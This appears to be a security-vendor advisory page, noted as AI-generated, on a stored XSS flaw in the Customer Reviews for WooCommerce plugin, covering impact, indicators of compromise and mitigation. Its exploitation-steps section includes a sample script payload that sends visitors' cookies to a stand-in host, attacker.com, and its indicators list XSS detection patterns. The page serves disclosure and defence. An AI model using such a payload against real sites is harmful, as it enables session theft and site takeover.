CVE-2026-76585
WordPress Análise e mitigação de vulnerabilidades

Visão geral

CVE-2026-76585 is an unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in the Customer Reviews for WooCommerce WordPress plugin. The flaw affects all versions of the plugin before 5.118.0 and was publicly disclosed on August 28, 2026, with NVD publication on August 30, 2026. It carries a CVSS score of 8.8 (High) and is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) (WPScan, Github Advisory).

Detalhes técnicos

The vulnerability stems from insufficient input sanitization and output escaping of customer review content submitted via one of the plugin's endpoints (specifically the comment parameter). Because no authentication is required to submit reviews, an attacker can inject arbitrary JavaScript into the review content, which is then stored in the database and rendered in the browsers of any user who views the affected review page. The root cause is classified as CWE-79 (Stored XSS), and the attack vector is network-accessible with no privileges required (WPScan). A proof-of-concept was withheld by WPScan until September 11, 2026, to allow time for users to update.

Impacto

Successful exploitation allows unauthenticated attackers to inject persistent malicious scripts into customer reviews, which execute in the browsers of any site visitor or authenticated user who views the affected content. This can result in session cookie theft, credential harvesting, unauthorized actions performed on behalf of authenticated users (including administrators), and redirection of visitors to malicious sites. In a WooCommerce context, compromise of an administrator session could lead to full site takeover, including installation of backdoors or exfiltration of customer data (WPScan, Github Advisory).

Exploração

As of the disclosure date, there is no confirmed evidence of in-the-wild exploitation or a publicly available proof-of-concept exploit; WPScan has intentionally delayed PoC publication until September 11, 2026. The EPSS score is reported as 0.0, and the vulnerability does not appear in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the unauthenticated nature of the attack and the wide deployment of the Customer Reviews for WooCommerce plugin make it an attractive target once a PoC becomes public (WPScan, Github Advisory).

Etapas de exploração

  1. Reconnaissance: Identify WordPress sites running the Customer Reviews for WooCommerce plugin (versions before 5.118.0) using tools like WPScan, Shodan, or by inspecting plugin directories on target sites.
  2. Locate the vulnerable endpoint: Identify the plugin's review submission endpoint (associated with the comment parameter) by reviewing the plugin's source code or observing network traffic during a legitimate review submission.
  3. Craft malicious payload: Prepare a Stored XSS payload, e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie;</script>, to be injected into the review content field.
  4. Submit the malicious review: Send an unauthenticated HTTP POST request to the plugin's review endpoint with the crafted payload in the comment parameter — no authentication or special privileges are required.
  5. Payload execution: When any user (including administrators) views the product page containing the malicious review, the injected script executes in their browser, enabling session hijacking, credential theft, or further attacks (WPScan).

Indicadores de compromisso

  • Network: Unusual POST requests to the Customer Reviews for WooCommerce plugin's review submission endpoint containing JavaScript tags or encoded script payloads in the comment parameter; outbound connections from site visitors' browsers to unknown external domains shortly after viewing product review pages.
  • Logs: WordPress or web server access logs showing repeated unauthenticated POST requests to the plugin's review endpoint with anomalous or oversized comment field values; error logs indicating unexpected script content in review submissions.
  • File System / Database: Review entries in the WordPress database (wp_comments or plugin-specific tables) containing <script>, javascript:, onerror=, or other XSS indicators in the comment body.
  • Process / Browser: Unexpected redirects or pop-ups experienced by site visitors or administrators when viewing product review pages; reports of session cookies being invalidated or accounts being accessed from unusual locations.

Mitigação e soluções alternativas

The vendor has released a patched version of the Customer Reviews for WooCommerce plugin (version 5.118.0), which includes proper sanitization and escaping of review content. Site administrators should update the plugin to version 5.118.0 or later immediately via the WordPress admin dashboard or WP-CLI. As interim mitigations, consider implementing a Web Application Firewall (WAF) rule to block suspicious review submissions, enforcing Content Security Policy (CSP) headers to restrict script execution, and temporarily disabling the review submission feature if updating is not immediately possible (WPScan, Github Advisory).

Reações da comunidade

The vulnerability was discovered and responsibly reported by a researcher identified as 'rasul' and verified by WPScan, which coordinated disclosure and delayed PoC publication until September 11, 2026, to allow users time to patch. No significant broader media coverage or notable public researcher commentary beyond the WPScan and GitHub Advisory disclosures has been identified at this time (WPScan).

Recursos adicionais


OrigemEste relatório foi gerado usando IA

Relacionado WordPress Vulnerabilidades:

CVE ID

Gravidade

Pontuação

Tecnologias

Nome do componente

Exploração do CISA KEV

Tem correção

Data de publicação

CVE-2026-81766NONEN/A
  • really-simple-ssl
NãoSimAug 30, 2026
CVE-2026-81660NONEN/A
  • groundhogg
NãoSimAug 30, 2026
CVE-2026-78364NONEN/A
  • mw-wp-form
NãoSimAug 30, 2026
CVE-2026-76585NONEN/A
  • customer-reviews-woocommerce
NãoSimAug 30, 2026
CVE-2026-19722NONEN/A
  • wpvivid-backuprestore
NãoSimAug 30, 2026

Avaliação de vulnerabilidade gratuita

Compare sua postura de segurança na nuvem

Avalie suas práticas de segurança na nuvem em 9 domínios de segurança para comparar seu nível de risco e identificar lacunas em suas defesas.

Solicitar avaliação

Marque uma demonstração personalizada

Pronto para ver a Wiz em ação?

"A melhor experiência do usuário que eu já vi, fornece visibilidade total para cargas de trabalho na nuvem."
David EstlickCISO
"A Wiz fornece um único painel de vidro para ver o que está acontecendo em nossos ambientes de nuvem."
Adam FletcherDiretor de Segurança
"Sabemos que se a Wiz identifica algo como crítico, na verdade é."
Greg PoniatowskiChefe de Gerenciamento de Ameaças e Vulnerabilidades